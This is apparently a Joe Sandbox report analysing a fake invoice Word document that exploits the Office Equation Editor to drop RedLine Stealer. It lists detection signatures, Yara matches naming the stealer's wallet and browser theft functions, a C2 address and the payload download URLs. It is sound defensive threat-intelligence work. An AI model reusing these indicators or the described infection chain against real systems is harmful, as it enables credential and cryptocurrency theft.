Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc

Overview

General Information

Sample name:Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc
Analysis ID:1461841
MD5:9edc82805ecc2d30f07d99973883c3c6
SHA1:877fae637a454593a1b66bfede20356803833266
SHA256:927e8668d7e5b22d0d278cb66ecbb15a51420f2fc5299aaa324d43a7d04719a2
Tags:docdocx
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected RedLine Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2780 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3404 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • notorious53209.exe (PID: 3468 cmdline: "C:\Users\user\AppData\Roaming\notorious53209.exe" MD5: 901A623DBCCAA22525373CD36195EE14)
        • RegSvcs.exe (PID: 3536 cmdline: "C:\Users\user\AppData\Roaming\notorious53209.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\notorious[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
      • 0x2aa6e:$obj2: \objdata
      • 0x2aa88:$obj3: \objupdate
      • 0x2aa4a:$obj4: \objemb
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9B70A7F.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
      • 0x2aa6e:$obj2: \objdata
      • 0x2aa88:$obj3: \objupdate
      • 0x2aa4a:$obj4: \objemb
      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x135ca:$a4: get_ScannedWallets
          • 0x12428:$a5: get_ScanTelegram
          • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
          • 0x1106a:$a7: <Processes>k__BackingField
          • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1099e:$a9: <ScanFTP>k__BackingField
          0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1048a:$u7: RunPE
          • 0x13b41:$u8: DownloadAndEx
          • 0x9130:$pat14: , CommandLine:
          • 0x13079:$v2_1: ListOfProcesses
          • 0x1068b:$v2_2: get_ScanVPN
          • 0x1072e:$v2_2: get_ScanFTP
          • 0x1141e:$v2_2: get_ScanDiscord
          • 0x1240c:$v2_2: get_ScanSteam
          • 0x12428:$v2_2: get_ScanTelegram
          • 0x124ce:$v2_2: get_ScanScreen
          • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
          • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
          • 0x13509:$v2_2: get_ScanBrowsers
          • 0x135ca:$v2_2: get_ScannedWallets
          • 0x135f0:$v2_2: get_ScanWallets
          • 0x13610:$v2_3: GetArguments
          • 0x11cd9:$v2_4: VerifyUpdate
          • 0x165ee:$v2_4: VerifyUpdate
          • 0x139ca:$v2_5: VerifyScanRequest
          • 0x130c6:$v2_6: GetUpdates
          • 0x165cf:$v2_6: GetUpdates
          0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            10.2.notorious53209.exe.170000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              10.2.notorious53209.exe.170000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                10.2.notorious53209.exe.170000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                • 0x117ca:$a4: get_ScannedWallets
                • 0x10628:$a5: get_ScanTelegram
                • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                • 0xf26a:$a7: <Processes>k__BackingField
                • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                • 0xeb9e:$a9: <ScanFTP>k__BackingField
                10.2.notorious53209.exe.170000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0xe68a:$u7: RunPE
                • 0x11d41:$u8: DownloadAndEx
                • 0x7330:$pat14: , CommandLine:
                • 0x11279:$v2_1: ListOfProcesses
                • 0xe88b:$v2_2: get_ScanVPN
                • 0xe92e:$v2_2: get_ScanFTP
                • 0xf61e:$v2_2: get_ScanDiscord
                • 0x1060c:$v2_2: get_ScanSteam
                • 0x10628:$v2_2: get_ScanTelegram
                • 0x106ce:$v2_2: get_ScanScreen
                • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                • 0x11709:$v2_2: get_ScanBrowsers
                • 0x117ca:$v2_2: get_ScannedWallets
                • 0x117f0:$v2_2: get_ScanWallets
                • 0x11810:$v2_3: GetArguments
                • 0xfed9:$v2_4: VerifyUpdate
                • 0x147ee:$v2_4: VerifyUpdate
                • 0x11bca:$v2_5: VerifyScanRequest
                • 0x112c6:$v2_6: GetUpdates
                • 0x147cf:$v2_6: GetUpdates
                10.2.notorious53209.exe.170000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 7 entries

                  Exploits

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3404, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\ExtExport2[1].exe

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.74.191, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\notorious53209.exe, NewProcessName: C:\Users\user\AppData\Roaming\notorious53209.exe, OriginalFileName: C:\Users\user\AppData\Roaming\notorious53209.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3404, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", ProcessId: 3468, ProcessName: notorious53209.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\notorious53209.exe, NewProcessName: C:\Users\user\AppData\Roaming\notorious53209.exe, OriginalFileName: C:\Users\user\AppData\Roaming\notorious53209.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3404, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", ProcessId: 3468, ProcessName: notorious53209.exe
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 2780, Protocol: tcp, SourceIp: 104.21.74.191, SourceIsIpv6: false, SourcePort: 443
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2780, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2780, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://universalmovies.top/Avira URL Cloud: Label: phishing
                  Source: https://universalmovies.top/notorious.docAvira URL Cloud: Label: malware
                  Source: https://universalmovies.top/FB8RjAvira URL Cloud: Label: phishing
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CD326501-1350-4080-AA2C-AD93E1795262}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
                  Source: 12.2.RegSvcs.exe.e0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\ExtExport2[1].exeReversingLabs: Detection: 50%
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeReversingLabs: Detection: 50%
                  Source: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docReversingLabs: Detection: 36%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\ExtExport2[1].exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.74.191 Port: 443Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exeJump to behavior
                  Source: ~WRF{CD326501-1350-4080-AA2C-AD93E1795262}.tmp.0.drStream path '_1780736942/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49169 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49170 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49174 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49175 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49166 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: Binary string: wntdll.pdb source: notorious53209.exe, 0000000A.00000003.395345081.0000000002B50000.00000004.00001000.00020000.00000000.sdmp, notorious53209.exe, 0000000A.00000003.395468267.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00294696 GetFileAttributesW,FindFirstFileW,FindClose,10_2_00294696
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029C93C FindFirstFileW,FindClose,10_2_0029C93C
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0029C9C7
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0029F200
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0029F35D
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0029F65E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00293A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00293A2B
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00293D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00293D4E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0029BF27

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: universalmovies.top
                  Source: global trafficDNS query: name: api.ip.sb
                  Source: global trafficDNS query: name: api.ip.sb
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
